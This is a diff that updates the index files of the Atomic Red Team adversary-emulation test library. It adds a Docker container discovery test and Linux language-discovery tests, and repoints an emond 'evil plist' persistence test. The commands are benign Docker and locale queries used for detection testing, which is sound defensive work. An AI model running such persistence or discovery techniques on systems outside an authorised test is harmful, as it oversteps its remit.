Merge branch 'redcanaryco:master' into T1078.003

atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-containers.json

@@ -1 +1 @@
-{"name":"Atomic Red Team (Containers)","versions":{"attack":"12","navigator":"4.7.1","layer":"4.4"},"description":"Atomic Red Team (Containers) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1053","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053/T1053.md"}]},{"techniqueID":"T1053.007","score":2,"enabled":true,"comment":"\n- ListCronjobs\n- CreateCronjob\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"}]},{"techniqueID":"T1552","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.007","score":2,"enabled":true,"comment":"\n- List All Secrets\n- ListSecrets\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"}]},{"techniqueID":"T1609","score":2,"enabled":true,"comment":"\n- ExecIntoContainer\n- Docker Exec Into Container\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"}]},{"techniqueID":"T1610","score":1,"enabled":true,"comment":"\n- Deploy Docker container\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1610/T1610.md"}]},{"techniqueID":"T1611","score":2,"enabled":true,"comment":"\n- Deploy container using nsenter container escape\n- Mount host filesystem to escape privileged Docker container\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]}]}
+{"name":"Atomic Red Team (Containers)","versions":{"attack":"12","navigator":"4.7.1","layer":"4.4"},"description":"Atomic Red Team (Containers) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1053","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053/T1053.md"}]},{"techniqueID":"T1053.007","score":2,"enabled":true,"comment":"\n- ListCronjobs\n- CreateCronjob\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"}]},{"techniqueID":"T1552","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.007","score":2,"enabled":true,"comment":"\n- List All Secrets\n- ListSecrets\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"}]},{"techniqueID":"T1609","score":2,"enabled":true,"comment":"\n- ExecIntoContainer\n- Docker Exec Into Container\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"}]},{"techniqueID":"T1610","score":1,"enabled":true,"comment":"\n- Deploy Docker container\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1610/T1610.md"}]},{"techniqueID":"T1611","score":2,"enabled":true,"comment":"\n- Deploy container using nsenter container escape\n- Mount host filesystem to escape privileged Docker container\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]},{"techniqueID":"T1613","score":1,"enabled":true,"comment":"\n- Container and ResourceDiscovery\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1613/T1613.md"}]}]}

atomics/Indexes/Indexes-CSV/containers-index.csv

@@ -1,4 +1,5 @@
 Tactic,Technique #,Technique Name,Test #,Test Name,Test GUID,Executor Name
+discovery,T1613,Container and Resource Discovery,1,Container and ResourceDiscovery,8a895923-f99f-4668-acf2-6cc59a44f05e,sh
 credential-access,T1552.007,Kubernetes List Secrets,1,List All Secrets,31e794c4-48fd-4a76-aca4-6587c155bc11,bash
 credential-access,T1552.007,Kubernetes List Secrets,2,ListSecrets,43c3a49d-d15c-45e6-b303-f6e177e44a9a,bash
 persistence,T1053.007,Kubernetes Cronjob,1,ListCronjobs,ddfb0bc1-3c3f-47e9-a298-550ecfefacbd,bash

atomics/Indexes/Indexes-CSV/index.csv

@@ -1159,6 +1159,7 @@ discovery,T1033,System Owner/User Discovery,2,System Owner/User Discovery,2a9b67
 discovery,T1033,System Owner/User Discovery,3,Find computers where user has session - Stealth mode (PowerView),29857f27-a36f-4f7e-8084-4557cd6207ca,powershell
 discovery,T1033,System Owner/User Discovery,4,User Discovery With Env Vars PowerShell Script,dcb6cdee-1fb0-4087-8bf8-88cfd136ba51,powershell
 discovery,T1033,System Owner/User Discovery,5,GetCurrent User with PowerShell Script,1392bd0f-5d5a-429e-81d9-eb9d4d4d5b3b,powershell
+discovery,T1613,Container and Resource Discovery,1,Container and ResourceDiscovery,8a895923-f99f-4668-acf2-6cc59a44f05e,sh
 discovery,T1615,Group Policy Discovery,1,Display group policy information via gpresult,0976990f-53b1-4d3f-a185-6df5be429d3b,command_prompt
 discovery,T1615,Group Policy Discovery,2,Get-DomainGPO to display group policy information via PowerView,4e524c4e-0e02-49aa-8df5-93f3f7959b9f,powershell
 discovery,T1615,Group Policy Discovery,3,WinPwn - GPOAudit,bc25c04b-841e-4965-855f-d1f645d7ab73,powershell
@@ -1318,6 +1319,10 @@ discovery,T1201,Password Policy Discovery,10,Use of SecEdit.exe to export the lo
 discovery,T1201,Password Policy Discovery,11,Examine AWS Password Policy,15330820-d405-450b-bd08-16b5be5be9f4,sh
 discovery,T1614.001,System Location Discovery: System Language Discovery,1,Discover System Language by Registry Query,631d4cf1-42c9-4209-8fe9-6bd4de9421be,command_prompt
 discovery,T1614.001,System Location Discovery: System Language Discovery,2,Discover System Language with chcp,d91473ca-944e-477a-b484-0e80217cd789,command_prompt
+discovery,T1614.001,System Location Discovery: System Language Discovery,3,Discover System Language with locale,837d609b-845e-4519-90ce-edc3b4b0e138,sh
+discovery,T1614.001,System Location Discovery: System Language Discovery,4,Discover System Language with localectl,07ce871a-b3c3-44a3-97fa-a20118fdc7c9,sh
+discovery,T1614.001,System Location Discovery: System Language Discovery,5,Discover System Language by locale file,5d7057c9-2c8a-4026-91dd-13b5584daa69,sh
+discovery,T1614.001,System Location Discovery: System Language Discovery,6,Discover System Language by Environment Variable Query,cb8f7cdc-36c4-4ed0-befc-7ad7d24dfd7a,sh
 discovery,T1012,Query Registry,1,Query Registry,8f7578c4-9863-4d83-875c-a565573bbdf0,command_prompt
 discovery,T1012,Query Registry,2,Enumerate COM Objects in Registry with Powershell,0d80d088-a84c-4353-af1a-fc8b439f1564,powershell
 discovery,T1518.001,Software Discovery: Security Software Discovery,1,Security Software Discovery,f92a380f-ced9-491f-b338-95a991418ce2,command_prompt

atomics/Indexes/Indexes-CSV/linux-index.csv

@@ -219,6 +219,10 @@ discovery,T1201,Password Policy Discovery,1,Examine password complexity policy -
 discovery,T1201,Password Policy Discovery,2,Examine password complexity policy - CentOS/RHEL 7.x,78a12e65-efff-4617-bc01-88f17d71315d,bash
 discovery,T1201,Password Policy Discovery,3,Examine password complexity policy - CentOS/RHEL 6.x,6ce12552-0adb-4f56-89ff-95ce268f6358,bash
 discovery,T1201,Password Policy Discovery,4,Examine password expiration policy - All Linux,7c86c55c-70fa-4a05-83c9-3aa19b145d1a,bash
+discovery,T1614.001,System Location Discovery: System Language Discovery,3,Discover System Language with locale,837d609b-845e-4519-90ce-edc3b4b0e138,sh
+discovery,T1614.001,System Location Discovery: System Language Discovery,4,Discover System Language with localectl,07ce871a-b3c3-44a3-97fa-a20118fdc7c9,sh
+discovery,T1614.001,System Location Discovery: System Language Discovery,5,Discover System Language by locale file,5d7057c9-2c8a-4026-91dd-13b5584daa69,sh
+discovery,T1614.001,System Location Discovery: System Language Discovery,6,Discover System Language by Environment Variable Query,cb8f7cdc-36c4-4ed0-befc-7ad7d24dfd7a,sh
 discovery,T1518.001,Software Discovery: Security Software Discovery,4,Security Software Discovery - ps (Linux),23b91cd2-c99c-4002-9e41-317c63e024a2,sh
 discovery,T1018,Remote System Discovery,6,Remote System Discovery - arp nix,acb6b1ff-e2ad-4d64-806c-6c35fe73b951,sh
 discovery,T1018,Remote System Discovery,7,Remote System Discovery - sweep,96db2632-8417-4dbb-b8bb-a8b92ba391de,sh

atomics/Indexes/Indexes-Markdown/containers-index.md

@@ -1,6 +1,7 @@
 # Containers Atomic Tests by ATT&CK Tactic & Technique
 # discovery
-- T1613 Container and Resource Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1613 Container and Resource Discovery](../../T1613/T1613.md)
+  - Atomic Test #1: Container and ResourceDiscovery [containers]
 - T1069 Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1046 Network Service Scanning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 

atomics/Indexes/Indexes-Markdown/index.md

@@ -1875,7 +1875,8 @@
   - Atomic Test #3: Find computers where user has session - Stealth mode (PowerView) [windows]
   - Atomic Test #4: User Discovery With Env Vars PowerShell Script [windows]
   - Atomic Test #5: GetCurrent User with PowerShell Script [windows]
-- T1613 Container and Resource Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1613 Container and Resource Discovery](../../T1613/T1613.md)
+  - Atomic Test #1: Container and ResourceDiscovery [containers]
 - T1016.001 Internet Connection Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1069 Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1069.003 Cloud Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -2067,6 +2068,10 @@
 - [T1614.001 System Location Discovery: System Language Discovery](../../T1614.001/T1614.001.md)
   - Atomic Test #1: Discover System Language by Registry Query [windows]
   - Atomic Test #2: Discover System Language with chcp [windows]
+  - Atomic Test #3: Discover System Language with locale [linux]
+  - Atomic Test #4: Discover System Language with localectl [linux]
+  - Atomic Test #5: Discover System Language by locale file [linux]
+  - Atomic Test #6: Discover System Language by Environment Variable Query [linux]
 - [T1012 Query Registry](../../T1012/T1012.md)
   - Atomic Test #1: Query Registry [windows]
   - Atomic Test #2: Enumerate COM Objects in Registry with Powershell [windows]

atomics/Indexes/Indexes-Markdown/linux-index.md

@@ -497,7 +497,11 @@
   - Atomic Test #2: Examine password complexity policy - CentOS/RHEL 7.x [linux]
   - Atomic Test #3: Examine password complexity policy - CentOS/RHEL 6.x [linux]
   - Atomic Test #4: Examine password expiration policy - All Linux [linux]
-- T1614.001 System Location Discovery: System Language Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1614.001 System Location Discovery: System Language Discovery](../../T1614.001/T1614.001.md)
+  - Atomic Test #3: Discover System Language with locale [linux]
+  - Atomic Test #4: Discover System Language with localectl [linux]
+  - Atomic Test #5: Discover System Language by locale file [linux]
+  - Atomic Test #6: Discover System Language by Environment Variable Query [linux]
 - T1614 System Location Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1518.001 Software Discovery: Security Software Discovery](../../T1518.001/T1518.001.md)
   - Atomic Test #4: Security Software Discovery - ps (Linux) [linux]

atomics/Indexes/Matrices/linux-matrix.md

@@ -25,7 +25,7 @@
 |  | Space after Filename [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Redundant Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Indicator Removal on Host: Timestomp](../../T1070.006/T1070.006.md) | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Data from Network Shared Drive [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | DNS Calculation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 |  | Malicious Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [SSH Authorized Keys](../../T1098.004/T1098.004.md) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Reflective Code Loading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials: Bash History](../../T1552.003/T1552.003.md) | [Permission Groups Discovery: Local Groups](../../T1069.001/T1069.001.md) |  | Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Multi-Stage Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 |  | [Scheduled Task/Job: At](../../T1053.002/T1053.002.md) | Kernel Modules and Extensions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Event Triggered Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials: Credentials In Files](../../T1552.001/T1552.001.md) | [Password Policy Discovery](../../T1201/T1201.md) |  | ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Resource Hijacking](../../T1496/T1496.md) |
-|  |  | Create Account: Domain Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: .bash_profile and .bashrc](../../T1546.004/T1546.004.md) | Binary Padding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Web Cookies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | System Location Discovery: System Language Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Data from Information Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Multiband Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+|  |  | Create Account: Domain Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: .bash_profile and .bashrc](../../T1546.004/T1546.004.md) | Binary Padding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Web Cookies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Location Discovery: System Language Discovery](../../T1614.001/T1614.001.md) |  | Data from Information Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Multiband Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 |  |  | Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Setuid and Setgid [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Impair Defenses: Disable or Modify System Firewall](../../T1562.004/T1562.004.md) | Forge Web Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | System Location Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  | File Transfer Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Destruction](../../T1485/T1485.md) |
 |  |  | Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Web Shell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | File Deletion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Multi-Factor Authentication Request Generation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Software Discovery: Security Software Discovery](../../T1518.001/T1518.001.md) |  |  |  | One-Way Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 |  |  | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Obfuscated Files or Information: Binary Padding](../../T1027.001/T1027.001.md) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Remote System Discovery](../../T1018/T1018.md) |  |  |  | [Proxy: Multi-hop Proxy](../../T1090.003/T1090.003.md) | Firmware Corruption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |

atomics/Indexes/Matrices/matrix.md

@@ -2,7 +2,7 @@
 | initial-access | execution | persistence | privilege-escalation | defense-evasion | credential-access | discovery | lateral-movement | collection | exfiltration | command-and-control | impact |
 |-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|
 | [External Remote Services](../../T1133/T1133.md) | [Scheduled Task/Job: Scheduled Task](../../T1053.005/T1053.005.md) | [Scheduled Task/Job: Scheduled Task](../../T1053.005/T1053.005.md) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Owner/User Discovery](../../T1033/T1033.md) | VNC [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Archive Collected Data: Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Encoding: Standard Encoding](../../T1132.001/T1132.001.md) | Disk Structure Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Windows Management Instrumentation](../../T1047/T1047.md) | Malicious Shell Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Scheduled Task](../../T1053.005/T1053.005.md) | Indicator Removal from Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md) | Container and Resource Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Taint Shared Content [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Screen Capture](../../T1113/T1113.md) | Scheduled Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Direct Network Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Windows Management Instrumentation](../../T1047/T1047.md) | Malicious Shell Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Scheduled Task](../../T1053.005/T1053.005.md) | Indicator Removal from Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md) | [Container and Resource Discovery](../../T1613/T1613.md) | Taint Shared Content [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Screen Capture](../../T1113/T1113.md) | Scheduled Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Direct Network Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Shared Modules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Signed Binary Proxy Execution: Rundll32](../../T1218.011/T1218.011.md) | [Input Capture: Keylogging](../../T1056.001/T1056.001.md) | Internet Connection Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Application Layer Protocol: DNS](../../T1071.004/T1071.004.md) | Stored Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter: JavaScript](../../T1059.007/T1059.007.md) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Plist Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Hidden Window [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Brute Force: Password Guessing](../../T1110.001/T1110.001.md) | Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | SSH [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Input Capture: Keylogging](../../T1056.001/T1056.001.md) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | External Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | [Phishing: Spearphishing Attachment](../../T1566.001/T1566.001.md) | [Kubernetes Cronjob](../../T1053.007/T1053.007.md) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Plist Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [OS Credential Dumping](../../T1003/T1003.md) | Cloud Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Deployment Software [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data from Configuration Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Automated Exfiltration](../../T1020/T1020.md) | Symmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |

atomics/Indexes/azure-ad-index.yaml

@@ -50853,6 +50853,7 @@ discovery:
       - 'Container: Container Enumeration'
       x_mitre_permissions_required:
       - User
+      identifier: T1613
     atomic_tests: []
   T1016.001:
     technique:

atomics/Indexes/containers-index.yaml

@@ -50614,7 +50614,44 @@ discovery:
       - 'Container: Container Enumeration'
       x_mitre_permissions_required:
       - User
-    atomic_tests: []
+      identifier: T1613
+    atomic_tests:
+    - name: Container and ResourceDiscovery
+      auto_generated_guid: 8a895923-f99f-4668-acf2-6cc59a44f05e
+      description: Adversaries may attempt to discover containers and other resources
+        that are available within a containers environment.
+      supported_platforms:
+      - containers
+      dependency_executor_name: sh
+      dependencies:
+      - description: Verify docker is installed.
+        prereq_command: 'which docker
+
+          '
+        get_prereq_command: 'if [ "" == "`which docker`" ]; then echo "Docker Not
+          Found"; if [ -n "`which apt-get`" ]; then sudo apt-get -y install docker
+          ; elif [ -n "`which yum`" ]; then sudo yum -y install docker ; fi ; else
+          echo "Docker installed"; fi
+
+          '
+      - description: Verify docker service is running.
+        prereq_command: 'sudo systemctl status docker  --no-pager
+
+          '
+        get_prereq_command: 'sudo systemctl start docker
+
+          '
+      executor:
+        command: |-
+          docker build -t t1613  $PathtoAtomicsFolder/T1613/src/
+          docker run --name t1613_container  -d -t t1613
+          docker ps
+          docker stats --no-stream
+          docker inspect $(docker ps -l -q --filter ancestor=t1613)
+        cleanup_command: |-
+          docker stop t1613_container
+          docker rmi -f t1613_container
+        name: sh
   T1016.001:
     technique:
       x_mitre_platforms:

atomics/Indexes/google-workspace-index.yaml

@@ -50196,6 +50196,7 @@ discovery:
       - 'Container: Container Enumeration'
       x_mitre_permissions_required:
       - User
+      identifier: T1613
     atomic_tests: []
   T1016.001:
     technique:

atomics/Indexes/iaas-index.yaml

@@ -50040,6 +50040,7 @@ discovery:
       - 'Container: Container Enumeration'
       x_mitre_permissions_required:
       - User
+      identifier: T1613
     atomic_tests: []
   T1016.001:
     technique:

atomics/Indexes/iaas_aws-index.yaml

@@ -50370,6 +50370,7 @@ discovery:
       - 'Container: Container Enumeration'
       x_mitre_permissions_required:
       - User
+      identifier: T1613
     atomic_tests: []
   T1016.001:
     technique:

atomics/Indexes/iaas_azure-index.yaml

@@ -50433,6 +50433,7 @@ discovery:
       - 'Container: Container Enumeration'
       x_mitre_permissions_required:
       - User
+      identifier: T1613
     atomic_tests: []
   T1016.001:
     technique:

atomics/Indexes/iaas_gcp-index.yaml

@@ -50196,6 +50196,7 @@ discovery:
       - 'Container: Container Enumeration'
       x_mitre_permissions_required:
       - User
+      identifier: T1613
     atomic_tests: []
   T1016.001:
     technique:

atomics/Indexes/index.yaml

@@ -40078,11 +40078,11 @@ privilege-escalation:
         script_location:
           description: evil plist location
           type: path
-          default: "$PathToAtomicsFolder/T1053.004/src/atomicredteam_T1053_004.plist"
+          default: "$PathToAtomicsFolder/T1543.001/src/atomicredteam_T1543_001.plist"
         script_destination:
           description: Path where to move the evil plist
           type: path
-          default: "/etc/emond.d/rules/atomicredteam_T1053_004.plist"
+          default: "/etc/emond.d/rules/atomicredteam_T1543_001.plist"
         empty_file:
           description: Random name of the empty file used to trigger emond service
           type: string
@@ -63920,11 +63920,11 @@ persistence:
         script_location:
           description: evil plist location
           type: path
-          default: "$PathToAtomicsFolder/T1053.004/src/atomicredteam_T1053_004.plist"
+          default: "$PathToAtomicsFolder/T1543.001/src/atomicredteam_T1543_001.plist"
         script_destination:
           description: Path where to move the evil plist
           type: path
-          default: "/etc/emond.d/rules/atomicredteam_T1053_004.plist"
+          default: "/etc/emond.d/rules/atomicredteam_T1543_001.plist"
         empty_file:
           description: Random name of the empty file used to trigger emond service
           type: string
@@ -83956,7 +83956,44 @@ discovery:
       - 'Container: Container Enumeration'
       x_mitre_permissions_required:
       - User
-    atomic_tests: []
+      identifier: T1613
+    atomic_tests:
+    - name: Container and ResourceDiscovery
+      auto_generated_guid: 8a895923-f99f-4668-acf2-6cc59a44f05e
+      description: Adversaries may attempt to discover containers and other resources
+        that are available within a containers environment.
+      supported_platforms:
+      - containers
+      dependency_executor_name: sh
+      dependencies:
+      - description: Verify docker is installed.
